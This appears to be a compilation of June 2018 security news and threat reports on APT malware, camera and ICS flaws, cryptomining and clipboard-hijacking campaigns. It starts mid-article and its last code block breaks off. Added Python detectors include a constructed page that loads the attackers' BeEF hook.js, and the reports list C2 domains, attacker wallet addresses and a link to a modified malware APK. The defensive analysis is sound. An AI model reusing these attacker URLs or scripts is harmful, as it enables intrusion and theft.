The other flaws discovered by VDOO can be exploited by unauthenticated attackers to crash various processes or to obtain information from the memory.


Technical details and proof-of-concept (PoC) code have been made public for each of the vulnerabilities.

Axis has published an advisory containing the names of all impacted cameras and which firmware version contains patches.

This was not the first time researchers discovered vulnerabilities in cameras from Axis. Roughly one year ago, Senrio found a security hole, dubbed Devil’s Ivy, that allowed an attacker to cause a DoS condition or execute arbitrary code on Axis cameras. Since that flaw affected a third-party component, other IoT devices were affected as well.

As part of its research into IoT products, VDOO also discovered serious vulnerabilities in Foscam cameras. Foscam also released patches, unlike last year when researchers were forced to disclose multiple flaws after the vendor failed to take action.


Cyber Attack Aims to Manipulate Mexican Election
18.6.2018 securityweek   BigBrothers

On Wednesday June 13, in the run-up to Mexico's July 1 presidential election, a website operated by the rightist National Action Party (PAN) was taken off-line for several hours by a DDoS attack. The outage occurred at the time of a televised presidential debate, and just following a point at which the PAN candidate held up a placard with the website address claiming it held proof of potential corruption.

PAN secretary Damian Zepeda later suggested that front-running leftist candidate Andres Manuel Lopez Obrador (AMLO) was behind the attack. "The AMLO bots have been activated to try to crash the page debate2018.mx where there are proofs of contracts worth millions given to AMLO's friend," Zepeda wrote on Twitter.

PAN later claimed that the site had been hit by 185,000 visits in 15 minutes, "with the attacks coming mainly from Russia and China." Lopez Obrador denied any involvement in the attack, and laughed off any suggestion of ties with Russia by calling himself 'Andres Manuelovich'.

The source of the DDoS attack is unknown and possibly unknowable -- but it is a reminder of the extent to which the internet can be used to influence or even control public opinion.

The accusations of Russian involvement in both the Trump election in the U.S. and the UK Brexit referendum are still fresh. Perhaps more directly relevant is the controversy over the DDoS attack on the FCC website just as it was gathering public comment on the (then) proposed elimination of the net neutrality rules.

The FCC claimed it had been taken off-line by a DDoS attack. Critics of the FCC plans have suggested it was purposely taken off-line to avoid registering mass public dissent over the FCC rules. If the Mexico event was a direct parallel to these claims, it could suggest that PAN couldn't prove the criticisms it was making, and took down the website itself.

This last possibility is not a serious proposal -- but it illustrates the plausible deniability and difficulty of attribution that comes with cyber activity. The DDoS attack could have been delivered by Russia (because it has a history of interference); by AMLO (to prevent access to his competitor's website); by the U.S. (because it would almost certainly prefer a right-leaning to a left-leaning neighbor); or by PAN itself (as a false flag). Or, of course, none of the above -- a straightforward DDoS attack by cybercriminals.

At this stage, the only thing that is certain is that a DDoS attack did take place in Mexico. Netscout Arbor's analysis of the period shows more than 300 attacks per day in Mexico during 12-13 June -- which is 50% higher than the normal frequency in the country. The largest volumetric DDoS attack targeting Mexico during the week was more than 200 Gbps.

"Political websites are frequent targets of DDoS attacks not only due to the ease of launching attacks, but also due to the desire and capabilities of attackers to impact the election process while staying undiscovered," comments Kirill Kasavchenko, principal security technologist at Netscout Arbor. "Due to the nature of modern DDoS attacks, it is quite easy to launch attacks from third countries utilizing computers and IoT devices infected by malware or using techniques like reflection of DDoS traffic. Tracing down the original source of the attack and the people behind it is problematic not only from a technical, but also from an administrative point of view."


DHS, FBI published a joint alert including technical details of Hidden Cobra-linked ‘Typeframe’ Malware
18.6.2018 securityaffairs BigBrothers

The US DHS and the FBI have published a new joint report that includes technical details of a piece of malware allegedly used by the Hidden Cobra APT.
A new joint report published by the US DHS and FBI details the TTPs associated with North Korea-linked threat groups, tracked by the US government as Hidden Cobra.

The US authorities have published the report to reduce the exposure to the activities of North Korea-linked APT groups.

Hidden Cobra’s arsenal includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest joint report includes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples analyzed by the government experts.

The researchers analyzed several executables and weaponized Word documents containing VBA macros.

“DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.” reads the joint report.

“This malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim’s firewall to allow incoming connections.”


The security alert includes indicators of compromise (IoCs) for each of the samples analyzed by the experts.

The report includes a description of the functionality for each sample, hashes, IPs, antivirus detections, metadata, and YARA rules.

In May, US authorities published another report on the Hidden Cobra detailing the Joanap backdoor trojan and the Brambul worm.

The only certainty is that North Korea continues to be one of the most aggressive and persistent threat actors in cyberspace.


China-Linked APT15 is still very active, experts found its new malware tracked as ‘MirageFox’
18.6.2018 securityaffairs APT

Following the recent hack of a US Navy contractor security experts found evidence of very recent activity by the China-linked APT group tracked as APT15.
The China-linked APT15 group (aka Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) has developed a new strain of malware that borrows code from one of the tools it used in past operations.

APT15 has been active since at least 2010 and has conducted cyber espionage campaigns against targets in the defense, high tech, energy, government, aerospace and manufacturing industries worldwide. The attackers have demonstrated an increasing level of sophistication over the years, using custom malware and various exploits in their attacks.

Across the years, security firms identified many hacking tools associated with APT15 such as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb.

The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.

In March 2018, APT15 used new backdoors in an attack that was likely part of a wider operation aimed at contractors at various UK government departments and military organizations.

One of the attacks aimed at a UK-based customer of NCC Group, an organization that provides a wide range of services to the United Kingdom government. The hackers focused on government departments and military technology by targeting the customer of the company.

NCC noted at the time that the APT15 used two new backdoors, tracked as RoyalCLI and RoyalDNS.

One of the backdoors has been tracked as RoyalCLI due to a debugging path left in the binary, and it is the successor of the BS2005 backdoor used by the group. Both RoyalCLI and BS2005 communicate with command and control (C&C) servers via Internet Explorer using the COM interface IWebBrowser2.

The attackers used Windows commands to conduct reconnaissance, and lateral movement was performed with a combination of the net command, mounting the C$ share of hosts and manually copying files to or from compromised hosts.

The second backdoor, tracked as RoyalDNS, uses DNS to communicate with the C&C server; once a command has been executed, the backdoor returns its output through DNS.

Researchers from security firm Intezer recently identified a new piece of malware linked to APT15. The discovery was accidental: the experts found the malware while hunting with YARA rules created for Mirage, one of the oldest tools used by APT15, and for the Reaver malware, which was linked to cyber espionage campaigns conducted by China-linked APT groups.

“Coincidentally, following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare, we have found evidence of very recent activity by a group referred to as APT15, known for committing cyber espionage which is believed to be affiliated with the Chinese government.” reads the analysis published by Intezer.

“The malware involved in this recent campaign, MirageFox, looks to be an upgraded version of a tool, a RAT believed to originate in 2012, known as Mirage.”

The new malware was tracked by the researchers as MirageFox, the name comes from a string found in one of the components that borrows code from both Mirage and Reaver.

The original Mirage malware includes the code for a remote shell and the function for decrypting command and control (C&C) configuration data.

Mirage also shares code with other malware attributed to APT15, including BMW, BS2005, and particularly MyWeb. Code similarities suggest the Reaver malware was also developed by APT15.

APT15 malware comparison

“MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth.” continues the analysis published by Intezer.

“Then it sends this information to the C&C, opens a backdoor, and sits waiting for commands from the C&C with functionality such as modifying files, launching processes, terminating itself, and more functionality typically seen in APT15’s RATs,”

The sample analyzed by the experts was compiled on June 8 and it was uploaded to VirusTotal on June 9.

The malware leverages a legitimate McAfee binary to load malicious code through DLL hijacking, a technique the group has already used in past attacks.

Intezer experts also noticed that the C&C server is configured as an internal IP address, a circumstance that confirms the sample was configured for a specific target organization.

“If you look at the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address. If you read the report mentioned above about RoyalAPT by NCC Group, it is mentioned that APT15 infiltrated an organization again after stealing a VPN private key, therefore we can assume this version was tailor made to an organization they have already infiltrated and are connecting to the internal network using a VPN.” continues the report.

At the time of writing the attack vector is still unclear; further technical details, including IoCs, are reported in the analysis published by the company.

“There is high confidence that MirageFox can be attributed to APT15 due to code and other similarities in the MirageFox binaries.” concludes Intezer.

“As is known about APT15, after infiltrating their target, they conduct a lot of reconnaissance work, send the commands from the C&C manually, and will customize their malware components to best suit the environment they have infected.”


China-Linked APT15 Develops New 'MirageFox' Malware
18.6.2018 securityweek APT 

A cyber-espionage group believed to be operating out of China has developed a new piece of malware that appears to be based on one of the first tools used by the threat actor.

The actor is known as APT15, Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon, and its tools are tracked by various cybersecurity companies as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb. The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.

One of APT15’s more recent attacks was uncovered last year when the hackers targeted a UK-based customer of NCC Group. The organization provides a wide range of services to the United Kingdom government and NCC believes the attackers may have targeted government departments and military technology through its customer.

NCC noted at the time that the group had improved its tools and techniques. The company had uncovered two new backdoors used by APT15, including RoyalCLI, a successor of BS2005, and RoyalDNS.

Intezer, a cybersecurity firm that specializes in recognizing code reuse, reported last week that it had identified a new piece of malware linked to APT15 based on YARA rules created for Mirage, the oldest tool used by the threat actor, and Reaver, another piece of malware previously linked by researchers to China.

The new malware, dubbed by Intezer MirageFox based on a string found in one of the components, shares code with both Mirage and Reaver. Experts have found significant similarities to the original Mirage malware, including in the code used for a remote shell and the function for decrypting command and control (C&C) configuration data.

Code similarities between Mirage and MirageFox

“MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth. Then it sends this information to the C&C, opens a backdoor, and sits waiting for commands from the C&C with functionality such as modifying files, launching processes, terminating itself, and more functionality typically seen in APT15’s RATs,” Jay Rosenberg, senior security researcher at Intezer, explained in a blog post.

The sample analyzed by the security firm was compiled on June 8 and uploaded to VirusTotal one day later. While it’s unclear how the malware has been distributed to victims, Intezer has made some interesting observations about MirageFox.

The malware appears to abuse a legitimate McAfee binary to load malicious processes through DLL hijacking. APT15 has been known to use DLL hijacking in its campaigns.

Intezer also noticed that a C&C server has an internal IP address, which suggests that the sample was specifically configured for the targeted organization and that, similar to the attack described earlier this year by NCC Group, the attackers gained access to the victim’s internal network using a VPN.

It’s unclear if they are connected, but Intezer pointed out that the discovery of MirageFox coincides with reports of an attack in which hackers believed to be sponsored by China stole sensitive information from a US Navy contractor.

While previous public reports on APT15 claim the group has been around since at least 2010, Rosenberg told SecurityWeek over the weekend that he has identified a Mirage sample uploaded to VirusTotal in 2009.

Rosenberg also noted that Mirage shares code with other pieces of malware attributed to APT15, including BMW, BS2005, and particularly MyWeb. The expert also believes, based on the code they share, that the developers of APT15 malware may have also created Reaver.


Android-based devices Amazon Fire TV and Fire Stick hit by cryptomining malware
18.6.2018 securityaffairs Android

A new crypto mining malicious code dubbed ADB.miner is targeting Android-based devices Amazon Fire TV and Fire Stick.
Recently, security experts spotted the crypto mining malware ADB.miner (Android.CoinMine.15) targeting Amazon Fire TV and Fire TV Stick devices.

The malicious code has been active since at least February, when researchers at Qihoo 360’s Netlab spotted the Android mining botnet, which targets Android devices by scanning for an open ADB debugging interface (port 5555) and infecting them with a Monero cryptocurrency miner.

Port 5555 is the port used by the ADB debug interface on Android devices, and it should normally be closed. The devices infected by ADB.miner are those on which users or vendors have voluntarily enabled debugging over port 5555.

The Amazon devices hit by ADB.miner expose the ADB (Android Debug Bridge) interface, so it is no surprise that they are now under attack.

Many Amazon Fire TV owners reported through a thread on the XDA forums that their streaming media players have been infected by the malware.

“Hi guys! I have a question I hope someone can help me with. I have a Gen 2 Firestick and for 2 days now this app called “test” keeps popping up at all times, I have no clue why it’s doing this. I have uninstalled the app and it comes back and I’ve even tried to run the app and it tells me the App needs updating to run on my device, look for an updated version on my store.. and yeah the app doesn’t exist on the store.. What is up with this thing?” wrote one of the Amazon Fire TV owners.

Once the malware has infected the device, it abuses its resources to mine cryptocurrency and disrupts video playback.

The infected devices display the official Android logo and a message that states “Test.”

“Infected devices will become very slow to use. Loading apps will take longer than usual. This is because the malware is using 100% of the device’s processor to mine cryptocurrency. A screen that says “Test” with a green Android robot icon will also occasionally appear randomly on infected devices. This screen causes video playback and apps to abruptly stop, making the device difficult to use normally.” states an analysis published on Aftvnews.com.

Amazon Fire TV malware

By reverse engineering the code of the Test app, the experts discovered it is a variation of ADB.Miner that opens a single HTML page containing the CoinHive script in an Android WebView to mine Monero. The code included in the app is reproduced in the original analysis.

Amazon Fire TV devices that have developer options disabled cannot be infected by ADB.miner.

If the Amazon device has already been infected, it is possible to install the Total Commander app to find and remove ADB.miner.

To discover if your device is infected:

Install Total Commander from the Amazon Appstore onto your Fire TV device.
Launch Total Commander and select the “Installed Apps” menu item.
If you see an app called “Test” installed on your device, then your device is infected.
Another way to remove the malicious code is to force a factory reset of the device; if you do not want to factory reset your device, you can install a modified version of the malicious app.

“If you do not want to factory reset your device and/or the malware keeps reappearing because your Fire TV keeps getting reinfected, you can try installing a modified version of the malware that doesn’t actually mine cryptocurrency. An XDA user by the name of innovaciones created this modified version of the malware. When installed, it updates the existing malware to a version that essentially turns off the miner.” concludes aftvnews.com.

“You can get the modified APK from this XDA post or from the short URL http://bit.ly/testappfix.”


Apple USB Restricted Mode feature will make it hard for law enforcement to crack devices
18.6.2018 securityaffairs Apple

Apple introduced a new feature in the latest beta versions of iOS, dubbed USB Restricted Mode, to improve the security of a locked device.
Apple is implementing a new feature dubbed USB Restricted Mode to improve the security of its devices: it locks down the iPhone’s data port to prevent unauthorized access, but experts observed that this will also render the password-cracking tools used by forensic investigators ineffective.

The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system; as ElcomSoft explained in a blog post, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but does not interrupt the charging process.

Any other data transfer would require the user providing the passcode.

Initially, the USB Restricted Mode required a passcode after 7 days.

Last week Apple provided an update on the new feature confirming that it will require a passcode every hour for the data transfers to continue.

“Apple said it was planning an iPhone software update that would effectively disable the phone’s charging and data port — the opening where users plug in headphones, power cables and adapters — an hour after the phone is locked.” reported the New York Times.

“While a phone can still be charged, a person would first need to enter the phone’s password to transfer data to or from the device using the port.”

Apple USB Restricted Mode feature

The new feature will have a significant impact on forensic investigations conducted with cracking tools such as Cellebrite and Grayshift’s GrayKey.

Brute-force attacks against the six-digit passcode that protects Apple devices are a time-consuming operation: cracking a device can take up to 22 hours.

The USB restricted mode that is enabled by default in the iOS 11.4.1 and iOS 12 betas will interfere with forensics tools.

Anyway, the new feature can be manually disabled.

Experts highlighted that the new feature will also impact the vendors of iPhone peripherals.


LuckyMouse hits national data center to organize country-level waterholing campaign
17.6.2018 Kaspersky APT Virus
In March 2018 we detected an ongoing campaign targeting a national data center in Central Asia that we believe has been active since autumn 2017. The choice of target made this campaign especially significant – it meant the attackers gained access to a wide range of government resources at one fell swoop. We believe this access was abused, for example, by inserting malicious scripts in the country’s official websites in order to conduct watering hole attacks.

The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit’s shikata_ga_nai encoder as well as LZNT1 compression.

Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. A full technical report, IoCs and YARA rules are available from our intelligence reporting service (contact us intelligence@kaspersky.com).

Who’s behind it?
Due to the tools and tactics in use we attribute the campaign to the Chinese-speaking actor LuckyMouse (also known as EmissaryPanda and APT27). The C2 domain update.iaacstudio[.]com was also previously used in their campaigns. The tools found in this campaign, such as the HyperBro Trojan, are regularly used by a variety of Chinese-speaking actors. Regarding Metasploit’s shikata_ga_nai encoder – although it’s available to everyone and couldn’t be the basis for attribution, we know this encoder has been used by LuckyMouse previously.

Government entities, including Central Asian ones, have been targeted by this actor before. Due to LuckyMouse’s ongoing waterholing of government websites and the corresponding dates, we suspect that one of the aims of this campaign is to access web pages via the data center and inject JavaScript into them.

How did the malware spread?
The initial infection vector used in the attack against the data center is unclear. Even though we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can’t prove they were related to this particular attack. It’s possible the actor used a waterhole to infect data center employees.

The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to an IP address belonging to a Ukrainian ISP network and held by a Mikrotik router running firmware version 6.34.4 (from March 2016) with SMBv1 on board. We suspect this router was hacked as part of the campaign in order to process the malware’s HTTP requests. The sonypsps[.]com domain was last updated via GoDaddy on 2017-05-05, with registration running until 2019-03-13.

Mikrotik router with two-year-old firmware and SMBv1 on board used in this campaign

In March 2017, Wikileaks published details about an exploit affecting Mikrotik called ChimayRed. According to the documentation, however, it doesn’t work for firmware versions higher than 6.30. This router uses version 6.34.

There were traces of HyperBro in the infected data center from mid-November 2017. Shortly after that different users in the country started being redirected to the malicious domain update.iaacstudio[.]com as a result of the waterholing of government websites. These events suggest that the data center infected with HyperBro and the waterholing campaign are connected.

What did the malware do in the data center?

Anti-detection stages. Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red)

The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db). As a result of all these steps, the last-stage Trojan is injected into svchost.exe’s process memory.

The launcher module, obfuscated with the notorious Metasploit’s shikata_ga_nai encoder, is the same for all the droppers. The resulting deobfuscated code performs typical side loading: it patches pcAnywhere’s image in memory at its entry point. The patched code jumps back to the decryptor’s second shikata_ga_nai iteration, but this time as part of the whitelisted application.

This Metasploit encoder obfuscates the last part of the launcher’s code, which in turn resolves the necessary API and maps thumb.db into the same process’s (pcAnywhere) memory. The first instructions in the mapped thumb.db are for a new shikata_ga_nai iteration. The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory.
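The LZNT1 step above is the one an analyst has to reproduce to pull the embedded PE out of a captured thumb.db. The decompressor below is an added example written for this page, not Kaspersky's code: it implements the LZNT1 chunk and back-reference format that RtlDecompressBuffer handles on Windows, so it can be run offline against a dumped buffer; the three sample inputs are constructed by hand, not taken from the campaign.

```python
"""Minimal LZNT1 decompressor (the format the launcher uses for thumb.db)."""
import struct


def split_fields(pos):
    """Length/offset bit split for a back-reference at chunk position pos.

    The offset field widens as the chunk fills: 4 offset bits for the first
    16 bytes of a chunk, 5 bits up to 32, and so on, capped at 12 bits.
    Returns (length_bits, length_mask).
    """
    offset_bits = 4
    while pos >= (1 << offset_bits) and offset_bits < 12:
        offset_bits += 1
    length_bits = 16 - offset_bits
    return length_bits, (1 << length_bits) - 1


def lznt1_decompress(data):
    """Decompress an LZNT1 stream; raises ValueError on a malformed buffer."""
    out = bytearray()
    i = 0
    while i + 2 <= len(data):
        header, = struct.unpack_from("<H", data, i)
        i += 2
        if header == 0:                  # end-of-stream marker
            break
        chunk_end = i + (header & 0x0FFF) + 1
        if chunk_end > len(data):
            raise ValueError("truncated chunk")
        if not header & 0x8000:          # stored chunk, copied verbatim
            out += data[i:chunk_end]
            i = chunk_end
            continue
        chunk_start = len(out)           # back-references never cross chunks
        while i < chunk_end:
            flags = data[i]
            i += 1
            for bit in range(8):         # one flag bit per token, LSB first
                if i >= chunk_end:
                    break
                if not flags & (1 << bit):
                    out.append(data[i])  # literal byte
                    i += 1
                    continue
                if i + 2 > chunk_end:
                    raise ValueError("truncated back-reference token")
                token, = struct.unpack_from("<H", data, i)
                i += 2
                length_bits, length_mask = split_fields(len(out) - chunk_start)
                length = (token & length_mask) + 3
                back = (token >> length_bits) + 1
                src = len(out) - back
                if src < chunk_start:
                    raise ValueError("back-reference points before chunk start")
                for _ in range(length):  # byte-wise copy: source may overlap dest
                    out.append(out[src])
                    src += 1
    return bytes(out)


# Constructed sample 1: literals "ABC", then a 9-byte back-reference with
# offset 3 that overlaps its own output -> b"ABCABCABCABC".
SAMPLE_OVERLAP = bytes([0x05, 0xB0, 0x08, 0x41, 0x42, 0x43, 0x06, 0x20])
# Constructed sample 2: a stored (uncompressed) chunk holding "XYZ".
SAMPLE_STORED = bytes([0x02, 0x30]) + b"XYZ"
# Constructed sample 3: 17 literals, then a back-reference at position 17,
# where the offset field has already widened to 5 bits.
SAMPLE_WIDE = (bytes([0x15, 0xB0, 0x00]) + b"ABCDEFGH"
               + b"\x00" + b"IJKLMNOP"
               + bytes([0x02]) + b"Q" + bytes([0x0E, 0x80]))

if __name__ == "__main__":
    print(lznt1_decompress(SAMPLE_OVERLAP))               # b'ABCABCABCABC'
    print(lznt1_decompress(SAMPLE_WIDE))                  # b'ABCDEFGHIJKLMNOPQ' * 2
    print(lznt1_decompress(SAMPLE_OVERLAP + SAMPLE_STORED + b"\x00\x00"))
```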

What does the resulting watering hole look like?
The websites were compromised to redirect visitors to instances of both ScanBox and BeEF. These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer.

Resulting script on the compromised government websites

Users were redirected to https://google-updata[.]tk:443/hook.js, a BeEF instance, and https://windows-updata[.]tk:443/scanv1.8/i/?1, an empty ScanBox instance that answered with a small piece of JavaScript code.
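Because the injected scripts are wrapped in a Dean Edwards style packer, a plain grep of a page for the redirect domains finds nothing. The following added example (not Kaspersky's tooling) unpacks the standard `eval(function(p,a,c,k,e,d){...}(...))` wrapper and then matches the recovered script against the domains named in this report; the packer body in the sample HTML is elided and the injected payload is constructed, only the domain list comes from the report.

```python
"""Unpack Dean Edwards style packed scripts and look for watering-hole domains."""
import re

# Captures the four arguments of the packer wrapper: p = packed source,
# a = radix, c = word count, k = keyword table ('|'-separated).
PACKER_RE = re.compile(
    r"eval\(function\(p,a,c,k,e,[dr]\)\{.*?\}\("
    r"'(?P<p>(?:[^'\\]|\\.)*)',(?P<a>\d+),(?P<c>\d+),"
    r"'(?P<k>(?:[^'\\]|\\.)*)'\.split\('\|'\)",
    re.S,
)


def encode(n, radix):
    """Port of the packer's e() function: digits 0-9, a-z, then A-Z."""
    prefix = "" if n < radix else encode(n // radix, radix)
    digit = n % radix
    if digit > 35:
        return prefix + chr(digit + 29)
    return prefix + (str(digit) if digit < 10 else chr(ord("a") + digit - 10))


def unpack(script):
    """Return the unpacked JavaScript, or None if the wrapper is absent."""
    m = PACKER_RE.search(script)
    if not m:
        return None
    packed = m.group("p").replace("\\'", "'")
    radix, count = int(m.group("a")), int(m.group("c"))
    words = m.group("k").split("|")
    # Same loop as the packer itself: highest index first, so that
    # multi-character tokens are restored before single-character ones.
    for i in range(count - 1, -1, -1):
        if i < len(words) and words[i]:
            token = r"\b" + re.escape(encode(i, radix)) + r"\b"
            packed = re.sub(token, lambda _m, w=words[i]: w, packed)
    return packed


def find_waterhole_redirects(html, bad_domains):
    """Unpack every <script> block and report which known-bad domains it references."""
    hits = set()
    for body in re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I):
        clear = unpack(body) or body
        hits.update(d for d in bad_domains if d in clear)
    return sorted(hits)


# Redirect/C2 domains named in the report (de-fanged brackets removed).
REPORT_DOMAINS = ["google-updata.tk", "windows-updata.tk", "update.iaacstudio.com"]

# Constructed sample page: the packer function body is elided ("/* ... */");
# the packed payload injects a script tag pointing at the hook.js URL above.
SAMPLE_HTML = (
    "<html><body><p>Ministry portal</p>"
    "<script>eval(function(p,a,c,k,e,d){/* packer body elided */}"
    "('0 1=2.3(\"4\");1.5=\"6://7-8.9/a.b\";2.c.d(1)',62,14,"
    "'var|s|document|createElement|script|src|https|google|updata|tk"
    "|hook|js|body|appendChild'.split('|'),0,{}))</script></body></html>"
)

if __name__ == "__main__":
    print(unpack(SAMPLE_HTML))
    print(find_waterhole_redirects(SAMPLE_HTML, REPORT_DOMAINS))  # ['google-updata.tk']
```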

Conclusions
LuckyMouse appears to have been very active recently. The TTPs for this campaign are quite common for Chinese-speaking actors, where they typically provide new solid wrappers (launcher and decompressor protected with shikata_ga_nai in this case) around their RATs (HyperBro).

The most unusual and interesting point here is the target. A national data center is a valuable source of data that can also be abused to compromise official websites. Another interesting point is the Mikrotik router, which we believe was hacked specifically for the campaign. The reasons for this are not very clear: typically, Chinese-speaking actors don’t bother disguising their campaigns. Maybe these are the first steps in a new stealthier approach.

Some indicators of compromise
Droppers

22CBE2B0F1EF3F2B18B4C5AED6D7BB79
0D0320878946A73749111E6C94BF1525

Launcher
ac337bd5f6f18b8fe009e45d65a2b09b

HyperBro in-memory Trojan
04dece2662f648f619d9c0377a7ba7c0

Domains and IPs
bbs.sonypsps[.]com
update.iaacstudio[.]com
wh0am1.itbaydns[.]com
google-updata[.]tk
windows-updata[.]tk


Two Critical flaws affect Schneider Electric U.motion Builder. Patch them now!
17.6.2018 securityaffairs ICS

Schneider Electric last week patched four flaws affecting the U.motion Builder software, including two critical command execution vulnerabilities.
Schneider Electric U.motion Builder is a tool designed for creating projects for U.motion devices that are used in critical manufacturing, energy, and commercial facilities industries.

“This exploit occurs when the submitted data of an input string is evaluated as a command by the application,” reads the advisory published by Schneider. “In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application.”

The critical stack-based buffer overflow vulnerability, tracked as CVE-2018-7784, received a CVSS score of 10.

The flaw was reported by the Chinese researcher who uses the online moniker “bigric3”, who also reported a critical remote command injection vulnerability, tracked as CVE-2018-7785, that can lead to authentication bypass.

The CVE-2018-7785 remote command injection flaw has also been assigned a CVSS score of 10.

Both flaws can be easily exploited by a remote attacker without specific skills.

Bigric3 has also reported a medium severity cross-site scripting (XSS) vulnerability, tracked as CVE-2018-7786, in the U.motion Builder application.

The last issue addressed by Schneider with the release of version 1.3.4 is an improper validation of the context parameter in an HTTP GET request. The flaw, tracked as CVE-2018-7787, was reported by Wei Gao of Ixia.

This issue has been classified as having medium severity.

The ICS-CERT and the U.S. National Cybersecurity & Communications Integration Center (NCCIC) have published a security advisory that also includes mitigations to minimize the risk of exploitation of these vulnerabilities.

According to the NCCIC, users should:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Perform proper impact analysis and risk assessment prior to deploying defensive measures.


ClipboardWalletHijacker miner hijacks your Ether and Bitcoin transaction, over 300,000 computers have been infected
17.6.2018 securityaffairs Virus

Researchers uncovered a new malware campaign spreading a clipboard hijacker dubbed ClipboardWalletHijacker that has already infected over 300,000 computers.
Security researchers from Qihoo 360 Total Security have spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that has already infected over 300,000 computers. Most of the victims are located in Asia, mainly China.

“Recently, 360 Security Center discovered a new type of actively spreading CryptoMiner, ClipboardWalletHijacker. The Trojan monitors clipboard activity to detect if it contains the account address of Bitcoin and Ethereum.” reads the analysis published by the company.

“It tampers with the receiving address to its own address to redirect the cryptocurrency to its own wallet. This kind of Trojans has been detected on more than 300 thousand computers within a week.”

The modus operandi of ClipboardWalletHijacker is not new: the malware monitors the Windows clipboard for Bitcoin and Ethereum addresses and replaces them with addresses controlled by the malware’s authors.

In March 2018, researchers at Palo Alto Networks discovered a malware dubbed ComboJack that is able to detect when users copy a cryptocurrency address and alter the clipboard to steal cryptocurrencies and payments.

In a similar way, ClipboardWalletHijacker aims at hijacking BTC and ETH transactions.

Experts observed the malware using the following addresses when replacing legitimate ones detected in users’ clipboards:

BTC: 1FoSfmjZJFqFSsD2cGXuccM9QMMa28Wrn1
BTC: 19gdjoWaE8i9XPbWoDbixev99MvvXUSNZL
ETH: 0x004D3416DA40338fAf9E772388A93fAF5059bFd5
The function that replaces a legitimate Ethereum wallet address with the attackers’ one is shown in the screenshot from the 360 analysis:
ClipboardWalletHijacker
By replacing the address with “0x004D3416DA40338fAf9E772388A93fAF5059bFd5”, the hackers have successfully hijacked 46 transactions.
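The defensive counterpart of that replacement routine is a check that the address about to be pasted is still the one the user copied. The guard below is an added example, not 360 Total Security's code: it does not hook the real Windows clipboard, the caller records the copied text and calls `check_paste` with the current clipboard content just before the paste is used. The "legitimate" addresses are constructed; the known-bad set holds only the three addresses quoted in the report.

```python
"""Detect a clipboard wallet-address swap of the kind ClipboardWalletHijacker performs."""
import re

# Legacy Bitcoin P2PKH/P2SH (Base58) and Ethereum (hex) address shapes.
BTC_RE = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")
ETH_RE = re.compile(r"^0x[0-9a-fA-F]{40}$")

# Attacker-controlled addresses quoted in the 360 report, lower-cased for lookup.
KNOWN_BAD = {a.lower() for a in (
    "1FoSfmjZJFqFSsD2cGXuccM9QMMa28Wrn1",
    "19gdjoWaE8i9XPbWoDbixev99MvvXUSNZL",
    "0x004D3416DA40338fAf9E772388A93fAF5059bFd5",
)}


def address_kind(text):
    """Return 'BTC', 'ETH' or None for a clipboard string."""
    text = text.strip()
    if BTC_RE.match(text):
        return "BTC"
    if ETH_RE.match(text):
        return "ETH"
    return None


def check_paste(copied, clipboard_now):
    """Compare what the user copied with what is about to be pasted.

    Returns 'ok' when the clipboard is unchanged or no wallet address was
    copied, 'swapped-known-bad' when the address was replaced by one of the
    addresses attributed to ClipboardWalletHijacker, and 'swapped' when it
    was replaced by anything else.
    """
    kind = address_kind(copied)
    if kind is None:
        return "ok"                      # the user did not copy a wallet address
    before, after = copied.strip(), clipboard_now.strip()
    if kind == "ETH":                    # EIP-55 mixed case is cosmetic, BTC is not
        before, after = before.lower(), after.lower()
    if before == after:
        return "ok"
    if after.lower() in KNOWN_BAD:
        return "swapped-known-bad"
    return "swapped"


# Constructed addresses standing in for a user's own wallets (valid shape only).
LEGIT_BTC = "1ExampLeConstructedAddr1111111111"
LEGIT_ETH = "0xa1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2"

if __name__ == "__main__":
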